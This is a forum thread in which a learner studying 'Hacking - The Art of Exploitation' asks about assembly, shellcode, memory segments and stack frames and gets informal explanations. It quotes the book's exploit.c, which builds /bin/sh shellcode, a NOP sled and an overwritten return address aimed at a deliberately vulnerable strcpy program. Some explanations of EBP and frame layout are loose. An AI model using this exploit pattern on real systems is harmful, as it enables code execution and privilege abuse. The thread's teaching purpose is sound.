Greetings,
I have been having trouble understanding stuff like pointers, so I thought reading about machine-level stuff like memory would help me understand them better.
I have been reading this book, "Hacking - The Art of Exploitation" by Jon Erickson. I am reading it hoping it'll give me a better understanding of what is happening "under the hood" of a running program.
Now, I've got some questions I hope you can answer:
What is assembly language, what are its main features, should I try to understand it, where can I learn it?
What is shellcode, what is it supposed to do, how/where can I learn it?
What is bytecode, what is it supposed to do, how/where can I learn it?
What can you tell me about the various memory segments? Text, Heap, Bss, Data and Stack. I think Text is where all instructions are located, Stack is where all of the variables that are passed to a function go and Heap is where all the program's variables go. But I don't know what the remaining ones represent.
Is the EIP (Extended Instruction Pointer) always located in the text segment?
And for now I believe these are all of my questions. I hope you can answer all of them.
Thank you in advance
Best Regards
Deimos
AMD ATHLON X2 5200+ 2.6GHz
ASUS GeForce 8600GTS
ASUS M2N-E SLI MB
2xKingston 1GB DDR2 800

What is assembly language, what are its main features, should I try to understand it, where can I learn it?
The lowest level you can realistically program in, short of writing raw machine code. Hand-written assembly can be more compact, and sometimes faster, than what a compiler produces from a high-level language. If you really want to know what a program is doing, sure. I dunno, but I doubt information on x86 (and x64) is THAT hard to locate. (I'd start with Wikipedia.)
What is shellcode, what is it supposed to do, how/where can I learn it?
An attack's payload. What it does depends on the attack. It's typically written in assembly and delivered as raw machine code.
What is bytecode, what is it supposed to do, how/where can I learn it?
What Java and .NET code compile down to. The respective virtual machines then interpret the bytecode or compile it into the relevant machine code. I'm sure both Sun and Microsoft have documentation on their bytecode somewhere.
Text = Where the compiler stores machine code
Data = Variables initialized by programmer
BSS = Variables not initialized by programmer
Stack = Where programs store (smallish) sets of data. Used mostly for function calls: push, pop, call, and ret all work on it.
Heap = Where programs store data. Typically larger than what's stored on the stack. If you create a variable with C++'s new or C's malloc, it goes to the heap.
Is the EIP (Extended Instruction Pointer) always located in the text segment?
Now what fun would that be? (No. EIP is a register that normally points into the text segment, but nothing forces it to. Otherwise, all of those remote code execution attacks wouldn't work.)

Thanks for your reply, it really helped.
I just have a couple more things I wanna get clarified:
My book talked about a specific shellcode that "spawns a user shell", what is that exactly?
I know that when there is a function call, first the arguments of that function are stored on the stack, then the return address where the EIP should return after the execution is finished, but I don't get what he calls "procedure prolog", what happens in this step?
In the stack, what is the EBP pointing to?
Are all of the memory segments independent or are they connected? For example, is the address 0x000000 unique or is there a 0x000000 in the heap and a different 0x000000 in the stack?
Best Regards
Deimos

I don't get what he calls "procedure prolog", what happens in this step?
It saves the caller's EBP on the stack, points EBP at the new frame, and makes room for local variables (plus it saves any other registers the function is going to clobber). The procedure epilogue undoes all that and restores the old register values.
In the stack, what is the EBP pointing to?
Traditionally, the working end of the stack.
Are all of the memory segments independent or are they connected
They share the same address space, so within one program an address like 0x000000 refers to exactly one place. So does memory-mapped hardware, BTW. Side note: modern OSes give each program its own (virtual) address space, to keep them isolated. This is why a program can crash, and nothing else goes with it.

So, if inside the stack we have only one stack frame, that means the EBP is pointing to the end of that stack frame as well, right?
And if we subtract the function parameters' bytes plus the function arguments' bytes plus 8 (sum of the registers) from the EBP, we get the beginning of the stack, which is the same as the beginning of the stack frame, correct?

Not quite; my last post was kinda misleading, so I guess I should clear that up.
The EBP marks the edge of the current function. Everything before that (with the exception of return values) is mostly static; it's outside the current function. Everything after it is "alive".
The stack frame is everything between the EBP and the ESP. If it's not, you're either dealing with a compiler doing weird things with registers (see this MS guy for such an example), or a corrupted stack.
In theory, you should be able to walk the stack back to the beginning by going to where the EBP points. Then go to the location where that memory points. Repeat until you're at the beginning.
Also, this is one of the reasons I hate assembly. Register names.

I'm having quite some trouble understanding this, maybe I need to study more stuff... anyways, I'd like to try a practical example, see if it helps:
Program from my book:
exploit.c
[code]
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// End the string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);
// Free the buffer memory
free(buffer);
return 0;
}
vuln.c
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
[End Code]
I get the crafting the buffer part: 200 NOP instructions (which should make the EIP slide down to the shellcode), the shellcode and then a whole bunch of return addresses.
And when the vuln program is called, it copies the previously crafted buffer (passed as its argument) into its own buffer, which overflows, and EIP gets assigned the return address, which was overwritten either by NOPs or by 'ret'.
I just don't get how the return address is calculated; what does the offset mean?
I feel I might be pushing your good will to help too far, but can you, please, write a short summary of what exactly occurs when the exploit program runs?

Okay, I've been leaving you hanging for a while now, but I haven't had the time to type this up. Still, I should probably throw something up, so here it goes.
The concepts involved aren't particularly tricky, nor are they overly exotic; just about every C programmer has corrupted the stack and crashed their program. If the programmer is lucky, they'll get a segfault. If not, it's up to them to find out what is corrupting the stack.
That said, there's a few computer science-y type observations you have to make:
1. To computers, everything's a number. Memory addresses? Numbers. Machine code (CPU instructions)? Numbers. Any one of these letters? A number.
2. A "string" is nothing more than a series of numbers called a character array. They're also called CStrings, because it's the closest C has to strings.
3. The computer cannot tell where one series of numbers ends and the next begins. Therefore, C has decided a string needs to end with a '\0' (or just 0, if you want).
So where do we stand right now? We know this C code:
char s[6];
s[0] = 'H'; s[1] = 'e'; s[2] = 'l'; s[3] = 'l'; s[4] = 'o'; s[5] = '\0';
produces:
 0xF5  0xF6  0xF7  0xF8  0xF9  0xFA
+=====+=====+=====+=====+=====+=====+
| 'H' | 'e' | 'l' | 'l' | 'o' |  0  |
+=====+=====+=====+=====+=====+=====+
 s[0]  s[1]  s[2]  s[3]  s[4]  s[5]
Simple, right?
4. The code s = "World" won't work. Why? You're trying to assign a series of numbers to a single slot. The solution? A bunch of functions designed to work with CStrings. In this case, we want this: strcpy(s, "World");. strcpy() will copy one byte after another, until it hits a '\0'. The basic logic looks like:
void strcpy(char *dest, char *source) {
    while (*source != 0) { /*Yes, this loop can be compacted into a single line,*/
        *dest = *source;   /*but I'm trying to avoid confusion.*/
        dest++;            /*Also, expect the real strcpy() to be optimized*/
        source++;          /*beyond the single line variant.*/
    }
    *dest = 0;             /*The terminating '\0' gets copied too.*/
}
Now we have:
 0xF5  0xF6  0xF7  0xF8  0xF9  0xFA
+=====+=====+=====+=====+=====+=====+
| 'W' | 'o' | 'r' | 'l' | 'd' |  0  |  (Notice the implicit '\0'
+=====+=====+=====+=====+=====+=====+   from "World".)
 s[0]  s[1]  s[2]  s[3]  s[4]  s[5]
These next few are the biggies:
5. There is nothing stopping you from going beyond (or overflowing) the array. s[6] = '!'; will compile just fine, even though the result is undefined behavior. The best you can hope for is your compiler throwing a warning. If not, you'll end up with
 0xF5  0xF6  0xF7  0xF8  0xF9  0xFA  0xFB
+=====+=====+=====+=====+=====+=====+=====+
| 'W' | 'o' | 'r' | 'l' | 'd' |  0  | '!' |
+=====+=====+=====+=====+=====+=====+=====+
 s[0]  s[1]  s[2]  s[3]  s[4]  s[5]
Since we have s[] on the stack, the stack is now corrupted.
6. Most of the time, we manipulate memory from lowest address to highest address. See? 0xF5 holds 'W'; 0xF6 holds 'o'; so on and so forth.
7. The stack doesn't. It moves from higher address to lower address as you add stuff. What does this mean? Whatever was in 0xFB has been overwritten, and replaced with '!'. At best, it was a local variable you no longer care about.
No, I don't know why the stack goes from high to low. I'm sure there was/is a perfectly valid reason. Maybe it made for a faster push on the 80186. I don't know, nor do I care enough to find out.
Yes, it would probably be slightly better to copy the string in reverse. We'd have the beginning of the string overflow instead of the end, but that's slower and requires (albeit trivially) more overhead. Besides, that wouldn't help the heap. It'd probably make the overflow a bit more obvious, though. In the following example, strcpy() would probably crash on its return. It may or may not write random data to random addresses, as well. (Hey, there's a reason why we call it undefined behavior.)
8. Where to go (in the code) after the function does its work is saved on the stack. It's pushed before any local variables, so it sits at a higher address than they do.
9. Now, replace "CString" with "buffer."
tl;dr: Everything's a number; All boundaries are imaginary; The stack moves in the wrong direction; Overflows can overwrite our return address; Use strncpy() instead of strcpy().
Example
Say we have a function, and this function starts off like this:
void doStuff() {
    char s[6];
    s[0] = 'H'; s[1] = 'e'; s[2] = 'l'; s[3] = 'l'; s[4] = 'o'; s[5] = '\0';
Its stack frame might look sorta kinda like this:
 0xF5  0xF6  0xF7  0xF8  0xF9  0xFA  0xFB  0xFC  0xFD  0xFE  0xFF
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
| 'H' | 'e' | 'l' | 'l' | 'o' |  0  | EBX | ECX | ESI | EBP | EIP |
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
 s[0]  s[1]  s[2]  s[3]  s[4]  s[5]  <<- Saved register data  ->>
Perfectly reasonable so far, right? 0xF5 through 0xFA holds our char array. Our function uses the registers EBX, ECX, and ESI, so we save them in 0xFB through 0xFD. Address 0xFE holds the caller's saved base pointer, and signifies the start of our stack frame. And 0xFF holds the star of this play. The return address. Held [not so] safely for whenever we leave this function. It'd be a shame if anything happened to it.
(Let's ignore the fact that the registers are apparently only one byte)
So, moving on. Let's say somewhere in this function we do this:
strcpy(s, "HelloWorld");
Not even emoticons can save our stack now.
Our sorry stack now looks like this:
 0xF5  0xF6  0xF7  0xF8  0xF9  0xFA  0xFB  0xFC  0xFD  0xFE  0xFF
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
| 'H' | 'e' | 'l' | 'l' | 'o' | 'W' | 'o' | 'r' | 'l' | 'd' |  0  |
+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+=====+
 s[0]  s[1]  s[2]  s[3]  s[4]  s[5]  <<- Overflow :(          ->>
Our function goes about its business, and we're cleaning up. The stack is screwed up, but we don't know that. We shove 'o', 'r', and 'l' into EBX, ECX, and ESI, respectively. Our Extended [stack] Base Pointer gets 'd' ('d' == 0x64, FYI).
Finally, EIP is loaded with 0. While I don't know exactly what that'll do, I do know it will crash this program. Probably with a segfault.
So let's take this one step further. We know how to overwrite the saved EIP. What if we fill this string with code we want to run; code that the programmer never intended to run; code that the owner doesn't want us to run? Our restrictions? I'm not really sure; you're the one with the book. But off-hand, I'd guess the sky's the limit. As long as we can get our code into the program, and overwrite the saved return address so it points to our code. That's the basic theory behind all of the buffer overflow attacks. Really, it's just like a virus infecting a cell.
Counters? Well, as programmers, we can be sure to validate any data someone gives us, and make sure we don't accept data past our buffers. As users? You could (and should) enable DEP.
Also: I'm sure I've screwed up more than once. If anyone finds anything, as always, speak up. Please.
